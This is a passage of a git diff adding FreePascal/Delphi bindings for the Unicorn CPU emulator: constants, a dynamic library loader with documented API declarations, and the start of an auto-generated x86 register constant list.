UC_VERSION_MINOR = 0; + UC_VERSION_EXTRA = 2; + UC_SECOND_SCALE = 1000000; + UC_MILISECOND_SCALE = 1000; + UC_ARCH_ARM = 1; + UC_ARCH_ARM64 = 2; + UC_ARCH_MIPS = 3; + UC_ARCH_X86 = 4; + UC_ARCH_PPC = 5; + UC_ARCH_SPARC = 6; + UC_ARCH_M68K = 7; + UC_ARCH_MAX = 8; + + UC_MODE_LITTLE_ENDIAN = 0; + UC_MODE_BIG_ENDIAN = 1073741824; + + UC_MODE_ARM = 0; + UC_MODE_THUMB = 16; + UC_MODE_MCLASS = 32; + UC_MODE_V8 = 64; + UC_MODE_ARM926 = 128; + UC_MODE_ARM946 = 256; + UC_MODE_ARM1176 = 512; + UC_MODE_MICRO = 16; + UC_MODE_MIPS3 = 32; + UC_MODE_MIPS32R6 = 64; + UC_MODE_MIPS32 = 4; + UC_MODE_MIPS64 = 8; + UC_MODE_16 = 2; + UC_MODE_32 = 4; + UC_MODE_64 = 8; + UC_MODE_PPC32 = 4; + UC_MODE_PPC64 = 8; + UC_MODE_QPX = 16; + UC_MODE_SPARC32 = 4; + UC_MODE_SPARC64 = 8; + UC_MODE_V9 = 16; + + UC_ERR_OK = 0; + UC_ERR_NOMEM = 1; + UC_ERR_ARCH = 2; + UC_ERR_HANDLE = 3; + UC_ERR_MODE = 4; + UC_ERR_VERSION = 5; + UC_ERR_READ_UNMAPPED = 6; + UC_ERR_WRITE_UNMAPPED = 7; + UC_ERR_FETCH_UNMAPPED = 8; + UC_ERR_HOOK = 9; + UC_ERR_INSN_INVALID = 10; + UC_ERR_MAP = 11; + UC_ERR_WRITE_PROT = 12; 
+ UC_ERR_READ_PROT = 13; + UC_ERR_FETCH_PROT = 14; + UC_ERR_ARG = 15; + UC_ERR_READ_UNALIGNED = 16; + UC_ERR_WRITE_UNALIGNED = 17; + UC_ERR_FETCH_UNALIGNED = 18; + UC_ERR_HOOK_EXIST = 19; + UC_ERR_RESOURCE = 20; + UC_ERR_EXCEPTION = 21; + UC_MEM_READ = 16; + UC_MEM_WRITE = 17; + UC_MEM_FETCH = 18; + UC_MEM_READ_UNMAPPED = 19; + UC_MEM_WRITE_UNMAPPED = 20; + UC_MEM_FETCH_UNMAPPED = 21; + UC_MEM_WRITE_PROT = 22; + UC_MEM_READ_PROT = 23; + UC_MEM_FETCH_PROT = 24; + UC_MEM_READ_AFTER = 25; + UC_HOOK_INTR = 1; + UC_HOOK_INSN = 2; + UC_HOOK_CODE = 4; + UC_HOOK_BLOCK = 8; + UC_HOOK_MEM_READ_UNMAPPED = 16; + UC_HOOK_MEM_WRITE_UNMAPPED = 32; + UC_HOOK_MEM_FETCH_UNMAPPED = 64; + UC_HOOK_MEM_READ_PROT = 128; + UC_HOOK_MEM_WRITE_PROT = 256; + UC_HOOK_MEM_FETCH_PROT = 512; + UC_HOOK_MEM_READ = 1024; + UC_HOOK_MEM_WRITE = 2048; + UC_HOOK_MEM_FETCH = 4096; + UC_HOOK_MEM_READ_AFTER = 8192; + UC_HOOK_INSN_INVALID = 16384; + UC_HOOK_MEM_UNMAPPED = 112; + UC_HOOK_MEM_PROT = 896; + UC_HOOK_MEM_READ_INVALID = 144; + UC_HOOK_MEM_WRITE_INVALID = 288; + UC_HOOK_MEM_FETCH_INVALID = 576; + UC_HOOK_MEM_INVALID = 1008; + UC_HOOK_MEM_VALID = 7168; + UC_QUERY_MODE = 1; + UC_QUERY_PAGE_SIZE = 2; + UC_QUERY_ARCH = 3; + UC_QUERY_TIMEOUT = 4; + + UC_PROT_NONE = 0; + UC_PROT_READ = 1; + UC_PROT_WRITE = 2; + UC_PROT_EXEC = 4; + UC_PROT_ALL = 7; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Unicorn_dyn.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Unicorn_dyn.pas new file mode 100644 index 0000000..427813c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/Unicorn_dyn.pas @@ -0,0 +1,673 @@ +{ + FreePascal/Delphi bindings for the UnicornEngine Emulator Engine \ + Tested On Mac - Win - Linux >> with FreePascal v3.0.4 & Delphi Berlin 10.2 . + + Copyright(c) 2018 Coldzer0 <Coldzer0 [at] protonmail.ch> . + + License: GPLv2 . 
+} + +unit Unicorn_dyn; + +{$IFDEF FPC} + {$MODE Delphi} + {$PackRecords C} +{$ENDIF} + +interface + +uses + {$IFDEF FPC}dynlibs,Crt{$ELSE} + {$ifdef mswindows} + windows,sysutils + {$ENDIF} + {$ENDIF}; + + +const +{$IFDEF Darwin} + UNICORN_LIB = './libunicorn.dylib'; +{$ENDIF} +{$ifdef Linux} + UNICORN_LIB = './libunicorn.so'; +{$endif} +{$ifdef mswindows} + UNICORN_LIB = './unicorn.dll'; +{$endif} + +type + uc_engine = Pointer; + uc_context = Pointer; // Opaque storage for CPU context, used with uc_context_*() + uc_hook = UIntPtr; + uc_arch = Cardinal; + uc_mode = Cardinal; + uc_err = Cardinal; + uc_query_type = Cardinal; + + {$IFNDEF FPC} // Delphi Support . + PUInt32 = ^UInt32; + {$ENDIF} + +type + { + Callback functions + Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) + @address: address where the code is being executed + @size: size of machine instruction(s) being executed, or 0 when size is unknown + @user_data: user data passed to tracing APIs. + } + uc_cb_hookcode_t = procedure(uc : uc_engine; address : UInt64; size : UInt32; user_data : Pointer); cdecl; + + { + Callback function for tracing interrupts (for uc_hook_intr()) + @intno: interrupt number + @user_data: user data passed to tracing APIs. + } + uc_cb_hookintr_t = procedure(uc : uc_engine; intno : UInt32; user_data : Pointer); cdecl; + + { + Callback function for tracing IN instruction of X86 + @port: port number + @size: data size (1/2/4) to be read from this port + @user_data: user data passed to tracing APIs. + } + uc_cb_insn_in_t = function(uc : uc_engine; port : UInt32; siz : integer; user_data : Pointer) : UInt32; cdecl; + + { + Callback function for OUT instruction of X86 . 
+ @port: port number + @size: data size (1/2/4) to be written to this port + @value: data value to be written to this port + } + uc_cb_insn_out_t = procedure(uc : uc_engine; port : UInt32; size : integer; value : UInt32; user_data : Pointer); cdecl; + + // All type of memory accesses for UC_HOOK_MEM_* + uc_mem_type = integer; + + // All type of hooks for uc_hook_add() API. + uc_hook_type = integer; + + { + Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH) + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + } + uc_cb_hookmem_t = procedure(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer); cdecl; + + { + Callback function for handling invalid memory access events (UNMAPPED and + PROT events) + + @type: this memory is being READ, or WRITE + @address: address where the code is being executed + @size: size of data being read or written + @value: value of data being written to memory, or irrelevant if type = READ. + @user_data: user data passed to tracing APIs + + @return: return true to continue, or false to stop program (due to invalid memory). + NOTE: returning true to continue execution will only work if the accessed + memory is made accessible with the correct permissions during the hook. + + In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback, + the memory should be uc_mem_map()-ed with the correct permissions, and the + instruction will then read or write to the address as it was supposed to. + + In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped + in as executable, in which case execution will resume from the fetched address. 
+ The instruction pointer may be written to in order to change where execution resumes, + but the fetch must succeed if execution is to resume. + } + uc_cb_eventmem_t = function(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer) : LongBool; cdecl; + + +type + { + Memory region mapped by uc_mem_map() and uc_mem_map_ptr() + Retrieve the list of memory regions with uc_mem_regions() + } + uc_mem_region = record + rBegin : UInt64; // begin address of the region (inclusive) + rEnd : UInt64; // end address of the region (inclusive) + rPerms : UInt32; // memory permissions of the region + end; + uc_mem_regionArray = array[0..(MaxInt div SizeOf(uc_mem_region))-1] of uc_mem_region; + Puc_mem_regionArray = ^uc_mem_regionArray; + + +// Exports +var +(* + Return combined API version & major and minor version numbers. + + @major: major number of API version + @minor: minor number of API version + + @return hexical number as (major << 8 | minor), which encodes both + major & minor versions. + NOTE: This returned value can be compared with version number made + with macro UC_MAKE_VERSION . + + For example, second API version would return 1 in @major, and 1 in @minor + The return value would be 0x0101 + + NOTE: if you only care about returned value, but not major and minor values, + set both @major & @minor arguments to NULL. +*) + uc_version : function (var major, minor : Cardinal) : Cardinal; cdecl; + +(* + Determine if the given architecture is supported by this library. + + @arch: architecture type (UC_ARCH_* ) + + @return True if this library supports the given arch. +*) + uc_arch_supported : function (arch : uc_arch) : LongBool; cdecl; + +(* + Create new instance of unicorn engine. + + @arch: architecture type (UC_ARCH_* ) + @mode: hardware mode. 
This is combined of UC_MODE_* + @uc: pointer to uc_engine, which will be updated at return time + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_open : function (arch : uc_arch; mode : uc_mode; var uc : uc_engine) : uc_err; cdecl; + +(* + Close UC instance: MUST do to release the handle when it is not used anymore. + NOTE: this must be called only when there is no longer usage of Unicorn. + The reason is the this API releases some cached memory, thus access to any + Unicorn API after uc_close() might crash your application. + After this, @uc is invalid, and nolonger usable. + + @uc: pointer to a handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_close : function (uc : uc_engine) : uc_err; cdecl; + +(* + Query internal status of engine. + + @uc: handle returned by uc_open() + @type: query type. See uc_query_type + + @result: save the internal status queried . + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*) + uc_query : function (uc : uc_engine; qtype : uc_query_type; result : PCardinal) : uc_err ; cdecl; + + +(* + Report the last error number when some API function fail. + Like glibc's errno, uc_errno might not retain its old value once accessed. + + @uc: handle returned by uc_open() + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*) + uc_errno : function (uc : uc_engine) : uc_err; cdecl; + +(* + Return a string describing given error code. + + @code: error code (see UC_ERR_* ) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code +*) + uc_strerror : function (code : uc_err) : PAnsiChar; cdecl; + +(* + Write to register. + + @uc: handle returned by uc_open() + @regid: register ID that is to be modified. + @value: pointer to the value that will set to register @regid . 
+ + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_reg_write : function (uc : uc_engine; regid : Integer; const value : Pointer) : uc_err; cdecl; + +(* + Read register value. + + @uc: handle returned by uc_open() + @regid: register ID that is to be retrieved. + @value: pointer to a variable storing the register value. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_reg_read: function (uc : uc_engine; regid : Integer; value : Pointer) : uc_err; cdecl ; + + +(* + Write multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to store + @value: pointer to array of register values + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_reg_write_batch : function(uc : uc_engine; regs : PIntegerArray; const values : Pointer; count : Integer) : uc_err; cdecl; + +(* + Read multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to retrieve + @value: pointer to array of values to hold registers + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_reg_read_batch : function(uc : uc_engine; regs : PIntegerArray; var values : Pointer; count : integer) : uc_err; cdecl; + +(* + Write to a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to set. + @bytes: pointer to a variable containing data to be written to memory. + @size: size of memory to write to. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). 
+*) + uc_mem_write_ : function (uc : uc_engine; address : UInt64; const bytes : Pointer; + size : Cardinal) : uc_err; cdecl; + +(* + Read a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to get. + @bytes: pointer to a variable containing data copied from memory. + @size: size of memory to read. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_mem_read_ : function (uc : uc_engine; address : UInt64; bytes : Pointer; + size : Cardinal) : uc_err; cdecl; + +(* + Emulate machine code in a specific duration of time. + + @uc: handle returned by uc_open() + @begin: address where emulation starts + @until: address where emulation stops (i.e when this address is hit) + @timeout: duration to emulate the code (in microseconds). When this value is 0, + we will emulate the code in infinite time, until the code is finished. + @count: the number of instructions to be emulated. When this value is 0, + we will emulate all the code available, until the code is finished. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_emu_start : function (uc : uc_engine; _begin, _until , timeout : UInt64; + count : Cardinal) : uc_err; cdecl; + +(* + Stop emulation (which was started by uc_emu_start() API. + This is typically called from callback functions registered via tracing APIs. + NOTE: for now, this will stop the execution only after the current block. + + @uc: handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). 
+*)
+ uc_emu_stop : function (uc : uc_engine) : uc_err; cdecl;
+
+(*
+function (uc : uc_engine; var hh : uc_hook; _type : integer;
+ callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; args : Array Of Const) : uc_err; cdecl;
+
+Register callback for a hook event.
+The callback will be run when the hook event is hit.
+
+@uc: handle returned by uc_open()
+@hh: hook handle returned from this registration. To be used in uc_hook_del() API
+@type: hook type
+@callback: callback to be run when instruction is hit
+@user_data: user-defined data. This will be passed to callback function in its
+ last argument @user_data
+@begin: start address of the area where the callback is effect (inclusive)
+@end: end address of the area where the callback is effect (inclusive)
+ NOTE 1: the callback is called only if related address is in range [@begin, @end]
+ NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered
+@...: variable arguments (depending on @type)
+ NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT)
+
+@return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+ for detailed error).
+*)
+ uc_hook_add : function (uc : uc_engine; var hh : uc_hook; _type : integer;
+ callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; args : Array Of Const) : uc_err; cdecl;
+
+ //uc_hook_add_1 : function (uc : uc_engine; var hh : uc_hook; _type : integer;
+ // callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1 : integer) : uc_err; cdecl;
+ //
+ //uc_hook_add_2 : function (uc : uc_engine; var hh : uc_hook; _type : integer;
+ // callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1, arg2 : UInt64) : uc_err; cdecl;
+ //
+(*
+ Unregister (remove) a hook callback.
+ This API removes the hook callback registered by uc_hook_add().
+ NOTE: this should be called only when you no longer want to trace.
+ After this, @hh is invalid, and no longer usable.
+ + @uc: handle returned by uc_open() + @hh: handle returned by uc_hook_add() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_hook_del : function (uc : uc_engine; hh : uc_hook) : uc_err; cdecl ; + +(* + Map memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_mem_map : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl; + + +(* + Map existing host memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + @ptr: pointer to host memory backing the newly mapped memory. This host memory is + expected to be an equal or larger size than provided, and be mapped with at + least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. 
+ + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_mem_map_ptr : function(uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32; ptr : Pointer) : uc_err; cdecl; + + +(* + Unmap a region of emulation memory. + This API deletes a memory mapping from the emulation memory space. + + @handle: handle returned by uc_open() + @address: starting address of the memory region to be unmapped. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_mem_unmap : function (uc : uc_engine; address : UInt64; size : Cardinal) : uc_err; cdecl ; + +(* + Set memory permissions for emulation memory. + This API changes permissions on an existing memory region. + + @handle: handle returned by uc_open() + @address: starting address of the memory region to be modified. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: New permissions for the mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_mem_protect : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl ; + +(* + Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() + This API allocates memory for @regions, and user must free this memory later + by free() to avoid leaking memory. 
+ NOTE: memory regions may be split by uc_mem_unmap()
+
+ @uc: handle returned by uc_open()
+ @regions: pointer to an array of uc_mem_region struct. >> Check "Puc_mem_regionArray"
+ This is allocated by Unicorn, and must be freed by user later.
+ @count: pointer to number of struct uc_mem_region contained in @regions
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+ for detailed error).
+*)
+ uc_mem_regions : function(uc : uc_engine; var regions : Puc_mem_regionArray; count : PUInt32) : uc_err; cdecl ;
+
+(*
+ Allocate a region that can be used with uc_context_{save,restore} to perform
+ quick save/rollback of the CPU context, which includes registers and some
+ internal metadata. Contexts may not be shared across engine instances with
+ differing arches or modes.
+
+ @uc: handle returned by uc_open()
+ @context: pointer to a uc_engine*. This will be updated with the pointer to
+ the new context on successful return of this function.
+ Later, this allocated memory must be freed with uc_free().
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+ for detailed error).
+*)
+ uc_context_alloc : function ( uc : uc_engine; var context : uc_context) : uc_err; cdecl ;
+
+(*
+ Free the memory allocated by uc_context_alloc & uc_mem_regions.
+
+ @mem: memory allocated by uc_context_alloc (returned in *context), or
+ by uc_mem_regions (returned in *regions)
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \
+ for detailed error).
+*)
+ uc_free : function (context : Pointer) : uc_err; cdecl ;
+
+
+(*
+ Save a copy of the internal CPU context.
+ This API should be used to efficiently make or update a saved copy of the
+ internal CPU state.
+
+ @uc: handle returned by uc_open()
+ @context: handle returned by uc_context_alloc()
+
+ @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \
+ for detailed error).
+*) + uc_context_save : function ( uc : uc_engine; context : uc_context) : uc_err; cdecl; + +(* + Restore the current CPU context from a saved copy. + This API should be used to roll the CPU context back to a previous + state saved by uc_context_save(). + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc that has been used with uc_context_save + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_context_restore : function(uc : uc_engine; context : uc_context) : uc_err; cdecl; + + +{============================= Global Functions ================================} + +// function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; +// callback : Pointer; user_data : Pointer; mBegin, mEnd : UInt64) : uc_err; overload; + //function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; + // callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1 : UInt64) : uc_err; overload; + //function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; + // callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1, arg2 : UInt64) : uc_err; overload; + // + + function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal; + +implementation + +function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal; +begin + Result := ((major shl 8) + minor); +end; + +var + UC_Handle : {$IFDEF FPC}dynlibs.{$ENDIF}HModule; + +function dyn_loadfunc(name : {$IFDEF FPC}string{$ELSE}PChar{$ENDIF}) : Pointer; +begin + Result := {$IFDEF FPC}dynlibs.{$ENDIF}GetProcAddress(UC_Handle,name); +end; + +function loadUC(): Boolean; +var + LastError : String; +begin + Result := false; + UC_Handle := {$IFDEF FPC}dynlibs.{$ENDIF}LoadLibrary(UNICORN_LIB); + if UC_Handle <> 0 then + begin + @uc_version := dyn_loadfunc('uc_version'); + if (@uc_version = nil) then exit(false); + + @uc_arch_supported := dyn_loadfunc('uc_arch_supported'); + if (@uc_arch_supported = nil) then exit(false); + + 
@uc_open := dyn_loadfunc('uc_open'); + if (@uc_open = nil) then exit(false); + + @uc_close := dyn_loadfunc('uc_close'); + if (@uc_close = nil) then exit(false); + + @uc_query := dyn_loadfunc('uc_query'); + if (@uc_query = nil) then exit(false); + + @uc_errno := dyn_loadfunc('uc_errno'); + if (@uc_errno = nil) then exit(false); + + @uc_strerror := dyn_loadfunc('uc_strerror'); + if (@uc_strerror = nil) then exit(false); + + @uc_reg_write := dyn_loadfunc('uc_reg_write'); + if (@uc_reg_write = nil) then exit(false); + + @uc_reg_read := dyn_loadfunc('uc_reg_read'); + if (@uc_reg_read = nil) then exit(false); + + @uc_reg_write_batch := dyn_loadfunc('uc_reg_write_batch'); + if (@uc_reg_write_batch = nil) then exit(false); + + @uc_reg_read_batch := dyn_loadfunc('uc_reg_read_batch'); + if (@uc_reg_read_batch = nil) then exit(false); + + @uc_mem_write_ := dyn_loadfunc('uc_mem_write'); + if (@uc_mem_write_ = nil) then exit(false); + + @uc_mem_read_ := dyn_loadfunc('uc_mem_read'); + if (@uc_mem_read_ = nil) then exit(false); + + @uc_emu_start := dyn_loadfunc('uc_emu_start'); + if (@uc_emu_start = nil) then exit(false); + + @uc_emu_stop := dyn_loadfunc('uc_emu_stop'); + if (@uc_emu_stop = nil) then exit(false); + + @uc_hook_add := dyn_loadfunc('uc_hook_add'); + if (@uc_hook_add = nil) then exit(false); + + @uc_hook_del := dyn_loadfunc('uc_hook_del'); + if (@uc_hook_del = nil) then exit(false); + + @uc_mem_map := dyn_loadfunc('uc_mem_map'); + if (@uc_mem_map = nil) then exit(false); + + @uc_mem_map_ptr := dyn_loadfunc('uc_mem_map_ptr'); + if (@uc_mem_map_ptr = nil) then exit(false); + + @uc_mem_unmap := dyn_loadfunc('uc_mem_unmap'); + if (@uc_mem_unmap = nil) then exit(false); + + @uc_mem_protect := dyn_loadfunc('uc_mem_protect'); + if (@uc_mem_protect = nil) then exit(false); + + @uc_mem_regions := dyn_loadfunc('uc_mem_regions'); + if (@uc_mem_regions = nil) then exit(false); + + @uc_context_alloc := dyn_loadfunc('uc_context_alloc'); + if (@uc_context_alloc = nil) then 
exit(false); + + @uc_context_save := dyn_loadfunc('uc_context_save'); + if (@uc_context_save = nil) then exit(false); + + @uc_context_restore := dyn_loadfunc('uc_context_restore'); + if (@uc_context_restore = nil) then exit(false); + + @uc_free := dyn_loadfunc('uc_free'); + if (@uc_free = nil) then exit(false); + + Result := true; + end + else + begin + {$IFDEF FPC}TextColor(LightRed);{$ENDIF} + LastError := {$IFDEF FPC}GetLoadErrorStr;{$ELSE} + {$ifdef mswindows} + SysErrorMessage(GetLastError,UC_Handle); + SetLastError(0); + {$ENDIF} + {$ENDIF} + WriteLn('error while loading unicorn library : ',LastError,#10); + {$IFDEF FPC}NormVideo;{$ENDIF} + end; +end; + +procedure FreeUC(); +begin + if UC_Handle <> 0 then + {$IFDEF FPC}dynlibs.{$ENDIF}FreeLibrary(UC_Handle); +end; + +initialization + UC_Handle := 0; + if not loadUC then halt(0); + +finalization + FreeUC(); +end. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/X86Const.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/X86Const.pas new file mode 100644 index 0000000..27994b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/X86Const.pas @@ -0,0 +1,1607 @@ +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT + +unit X86Const; + +interface + +const +// X86 registers + + UC_X86_REG_INVALID = 0; + UC_X86_REG_AH = 1; + UC_X86_REG_AL = 2; + UC_X86_REG_AX = 3; + UC_X86_REG_BH = 4; + UC_X86_REG_BL = 5; + UC_X86_REG_BP = 6; + UC_X86_REG_BPL = 7; + UC_X86_REG_BX = 8; + UC_X86_REG_CH = 9; + UC_X86_REG_CL = 10; + UC_X86_REG_CS = 11; + UC_X86_REG_CX = 12; + UC_X86_REG_DH = 13; + UC_X86_REG_DI = 14; + UC_X86_REG_DIL = 15; + UC_X86_REG_DL = 16; + UC_X86_REG_DS = 17; + UC_X86_REG_DX = 18; + UC_X86_REG_EAX = 19; + UC_X86_REG_EBP = 20; + UC_X86_REG_EBX = 21; + UC_X86_REG_ECX = 22; + UC_X86_REG_EDI = 23; + UC_X86_REG_EDX = 24; + UC_X86_REG_EFLAGS = 25; + UC_X86_REG_EIP = 26; + UC_X86_REG_EIZ = 27; + UC_X86_REG_ES = 28; + UC_X86_REG_ESI = 29; + UC_X86_REG_ESP = 30; + UC_X86_REG_FPSW = 31; + UC_X86_REG_FS = 32; + UC_X86_REG_GS = 33; + UC_X86_REG_IP = 34; + UC_X86_REG_RAX = 35; + UC_X86_REG_RBP = 36; + UC_X86_REG_RBX = 37; + UC_X86_REG_RCX = 38; + UC_X86_REG_RDI = 39; + UC_X86_REG_RDX = 40; + UC_X86_REG_RIP = 41; + UC_X86_REG_RIZ = 42; + UC_X86_REG_RSI = 43; + UC_X86_REG_RSP = 44; + UC_X86_REG_SI = 45; + UC_X86_REG_SIL = 46; + UC_X86_REG_SP = 47; + UC_X86_REG_SPL = 48; + UC_X86_REG_SS = 49; + UC_X86_REG_CR0 = 50; + UC_X86_REG_CR1 = 51; + UC_X86_REG_CR2 = 52; + UC_X86_REG_CR3 = 53; + UC_X86_REG_CR4 = 54; + UC_X86_REG_CR5 = 55; + UC_X86_REG_CR6 = 56; + UC_X86_REG_CR7 = 57; + UC_X86_REG_CR8 = 58; + UC_X86_REG_CR9 = 59; + UC_X86_REG_CR10 = 60; + UC_X86_REG_CR11 = 61; + UC_X86_REG_CR12 = 62; + UC_X86_REG_CR13 = 63; + UC_X86_REG_CR14 = 64; + UC_X86_REG_CR15 = 65; + UC_X86_REG_DR0 = 66; + UC_X86_REG_DR1 = 67; + UC_X86_REG_DR2 = 68; + UC_X86_REG_DR3 = 69; + UC_X86_REG_DR4 = 70; + UC_X86_REG_DR5 = 71; + UC_X86_REG_DR6 = 72; + UC_X86_REG_DR7 = 73; + UC_X86_REG_DR8 = 74; + UC_X86_REG_DR9 = 75; + UC_X86_REG_DR10 = 76; + UC_X86_REG_DR11 = 77; + UC_X86_REG_DR12 = 78; + UC_X86_REG_DR13 = 79; + UC_X86_REG_DR14 = 80; + UC_X86_REG_DR15 = 81; + UC_X86_REG_FP0 = 82; + 
UC_X86_REG_FP1 = 83; + UC_X86_REG_FP2 = 84; + UC_X86_REG_FP3 = 85; + UC_X86_REG_FP4 = 86; + UC_X86_REG_FP5 = 87; + UC_X86_REG_FP6 = 88; + UC_X86_REG_FP7 = 89; + UC_X86_REG_K0 = 90; + UC_X86_REG_K1 = 91; + UC_X86_REG_K2 = 92; + UC_X86_REG_K3 = 93; + UC_X86_REG_K4 = 94; + UC_X86_REG_K5 = 95; + UC_X86_REG_K6 = 96; + UC_X86_REG_K7 = 97; + UC_X86_REG_MM0 = 98; + UC_X86_REG_MM1 = 99; + UC_X86_REG_MM2 = 100; + UC_X86_REG_MM3 = 101; + UC_X86_REG_MM4 = 102; + UC_X86_REG_MM5 = 103; + UC_X86_REG_MM6 = 104; + UC_X86_REG_MM7 = 105; + UC_X86_REG_R8 = 106; + UC_X86_REG_R9 = 107; + UC_X86_REG_R10 = 108; + UC_X86_REG_R11 = 109; + UC_X86_REG_R12 = 110; + UC_X86_REG_R13 = 111; + UC_X86_REG_R14 = 112; + UC_X86_REG_R15 = 113; + UC_X86_REG_ST0 = 114; + UC_X86_REG_ST1 = 115; + UC_X86_REG_ST2 = 116; + UC_X86_REG_ST3 = 117; + UC_X86_REG_ST4 = 118; + UC_X86_REG_ST5 = 119; + UC_X86_REG_ST6 = 120; + UC_X86_REG_ST7 = 121; + UC_X86_REG_XMM0 = 122; + UC_X86_REG_XMM1 = 123; + UC_X86_REG_XMM2 = 124; + UC_X86_REG_XMM3 = 125; + UC_X86_REG_XMM4 = 126; + UC_X86_REG_XMM5 = 127; + UC_X86_REG_XMM6 = 128; + UC_X86_REG_XMM7 = 129; + UC_X86_REG_XMM8 = 130; + UC_X86_REG_XMM9 = 131; + UC_X86_REG_XMM10 = 132; + UC_X86_REG_XMM11 = 133; + UC_X86_REG_XMM12 = 134; + UC_X86_REG_XMM13 = 135; + UC_X86_REG_XMM14 = 136; + UC_X86_REG_XMM15 = 137; + UC_X86_REG_XMM16 = 138; + UC_X86_REG_XMM17 = 139; + UC_X86_REG_XMM18 